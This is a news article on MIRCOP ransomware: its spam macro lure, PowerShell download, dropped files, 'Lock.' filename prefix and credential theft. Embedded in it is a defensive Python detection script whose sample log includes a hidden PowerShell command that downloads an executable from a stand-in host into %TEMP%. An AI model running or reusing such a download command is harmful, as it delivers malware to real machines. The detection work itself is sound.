SecurityWeek

MIRCOP Ransomware Claims to be Victim, Demands Payback

Ransomware authors use various techniques to encourage victims to pay a ransom, and the actors behind a new threat called MIRCOP are employing an unusual one: the ransom note claims that the victim stole 48.48 Bitcoins. 

What’s more, the ransom note displays a hooded figure in a Guy Fawkes mask, which has been long associated with notorious hacktivist group Anonymous, and offers little instruction on how the victim should pay the ransom. Instead, it suggests that the victim knows how to return the money and that they know who to send the ransom demand to.

At 48.48 Bitcoins, the ransom amounts to around $30,000, one of the highest seen, and the ransom note threatens that further action will be taken if the victim doesn’t pay, researchers at Trend Micro reveal. The note does mention a Bitcoin address, although it doesn’t explain how victims can make crypto-currency transactions, and no payment has been made to that address as of now.

The MIRCOP ransomware is distributed as a malicious document in spam emails, supposedly representing a Thai customs form used when importing or exporting goods. The document asks users to enable macros so they can sign it, but the macro instead abuses Windows PowerShell to download and execute the malicious payload.

MIRCOP drops three files in the %Temp% folder: c.exe (a routine that steals information), and x.exe and y.exe (both used to encrypt files). Rather than appending an extension to encrypted files, as other ransomware families do, the new threat prepends the string “Lock.” to file names, and it also encrypts common folders.
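The two behaviours described above (an Office document whose macro launches PowerShell, and the “Lock.”-prefixed files plus the three executables dropped in %Temp%) are the kind of indicators a defender can check for directly. The script below is an added example written for this page; it is not code from the SecurityWeek article or from Trend Micro. The process-creation log format (`parent=… child=… cmd=…`), the sample events, and the `Alert` structure are constructed for the example; the file names c.exe, x.exe, y.exe and the “Lock.” prefix are the ones the article reports.

```python
"""Added example (not from the article or Trend Micro): two defender-side
checks for the MIRCOP indicators described on this page.

1. Process-creation events where an Office application spawns PowerShell,
   which is how the malicious document's macro fetches the payload.
2. Files whose names start with "Lock." (MIRCOP prepends this instead of
   appending an extension) and the three dropped names in %Temp%.

The log line format and field names are constructed for this example;
adapt EVENT_RE to whatever Sysmon/EDR export you actually have.
"""
import os
import re
import tempfile
from dataclasses import dataclass
from typing import Iterable, List

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
DROPPED_NAMES = {"c.exe", "x.exe", "y.exe"}  # names reported in the article
LOCK_PREFIX = "Lock."

# Constructed sample events, one per line:
#   <timestamp> parent=<image> child=<image> cmd=<command line>
SAMPLE_EVENTS = """\
2016-06-27T09:12:01 parent=explorer.exe child=winword.exe cmd=WINWORD.EXE customs_form.doc
2016-06-27T09:12:07 parent=winword.exe child=powershell.exe cmd=powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/p.exe','%TEMP%\\x.exe')
2016-06-27T09:14:30 parent=explorer.exe child=powershell.exe cmd=powershell.exe Get-ChildItem C:\\Users
2016-06-27T09:15:02 parent=excel.exe child=powershell.exe cmd=powershell.exe -enc SQBFAFgA
"""

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) parent=(?P<parent>\S+) child=(?P<child>\S+) cmd=(?P<cmd>.*)$"
)


@dataclass
class Alert:
    ts: str
    reason: str
    detail: str


def office_spawning_powershell(lines: Iterable[str]) -> List[Alert]:
    """Flag every event in which an Office process launches powershell.exe."""
    alerts: List[Alert] = []
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if not m:
            continue  # not a process-creation line in the expected format
        parent, child = m["parent"].lower(), m["child"].lower()
        if parent in OFFICE_PARENTS and child == "powershell.exe":
            alerts.append(Alert(m["ts"], "office-spawned-powershell", f"{parent} -> {m['cmd']}"))
    return alerts


def scan_for_mircop_artifacts(root: str, temp_dir: str) -> List[str]:
    """Return paths of 'Lock.'-prefixed files under root and of c.exe/x.exe/y.exe
    inside temp_dir (the %Temp% folder on a real host). Missing dirs yield []."""
    hits: List[str] = []
    for dirpath, _, filenames in os.walk(root):
        hits.extend(os.path.join(dirpath, n) for n in filenames if n.startswith(LOCK_PREFIX))
    if os.path.isdir(temp_dir):
        for name in os.listdir(temp_dir):
            path = os.path.join(temp_dir, name)
            if name.lower() in DROPPED_NAMES and os.path.isfile(path):
                hits.append(path)
    return sorted(hits)


def demo() -> dict:
    """Run both checks against constructed data and return what they found."""
    alerts = office_spawning_powershell(SAMPLE_EVENTS.splitlines())
    with tempfile.TemporaryDirectory() as tmp:
        docs = os.path.join(tmp, "Documents")
        fake_temp = os.path.join(tmp, "Temp")
        os.makedirs(docs)
        os.makedirs(fake_temp)
        for name in ("Lock.report.docx", "notes.txt"):  # one encrypted, one clean
            open(os.path.join(docs, name), "w").close()
        open(os.path.join(fake_temp, "x.exe"), "w").close()  # one dropped file
        files = [os.path.basename(p) for p in scan_for_mircop_artifacts(docs, fake_temp)]
    return {"alerts": [a.reason for a in alerts], "files": files}


if __name__ == "__main__":
    print(demo())
```

The process check keys on the parent/child relationship rather than on the command line, so it still fires when the download command is obfuscated or encoded; the file check is a cheap post-infection sweep and only confirms the specific names and prefix the article reports, so treat an empty result as "no MIRCOP artifacts found", not as "clean".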

In addition to encrypting files on the infected machine, MIRCOP can steal credentials from various applications, including Mozilla Firefox, Google Chrome, Opera, FileZilla, and Skype, researchers discovered. In this regard, MIRCOP is not the first ransomware to pack info-stealing capabilities, given that CryptXXX has had the feature for over two months now.

“Social engineering in the form of spam can lead to infection, especially when the malware employs underhanded tactics such as macro malware leveraging on PowerShell in attached files. Users should be careful when receiving mail from unknown sources and should refrain from downloading and opening their attachments if any,” Trend Micro researchers note.

Since the beginning of this year, ransomware has emerged as a prevalent threat, and a recent report from Kaspersky revealed that the number of users attacked with cryptoware increased 5.5 times over the past couple of years. At the moment, Locky appears to be the top ransomware out there, courtesy of massive infection campaigns powered by the Necurs botnet.

Related: Bart Ransomware Doesn’t Require C&C Server to Encrypt Files
